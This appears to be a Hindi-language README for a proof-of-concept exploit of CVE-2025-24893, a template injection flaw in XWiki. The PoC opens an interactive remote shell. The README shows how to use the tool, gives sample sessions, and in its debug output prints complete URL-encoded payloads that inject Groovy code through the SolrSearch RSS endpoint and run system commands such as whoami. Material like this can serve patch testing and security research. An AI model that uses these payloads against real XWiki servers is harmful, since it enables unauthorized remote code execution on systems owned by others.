
CVE-2025-24893 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो XWiki में एक SSTI भेद्यता है, जो रिमोट कमांड निष्पादन के लिए एक इंटरैक्टिव शेल प्रदान करता है।
यह PoC पहले SSTI का परीक्षण करता है और यदि यह काम करता है। यह लूप में चलता है और आपको दूरस्थ रूप से कमांड चलाने की अनुमति देता है।
exec और shell कमांड वर्तमान में समान कार्य करते हैं।
python3 poc.py <target>
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
xwiki
स्क्रिप्ट के शीर्ष पर मौजूद debug फ्लैग आपको उत्पन्न URLs दिखाएगा। यह एक debug.log फ़ाइल बनाएगा जिसमें अनुरोध का कच्चा प्रतिक्रिया होगा।
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki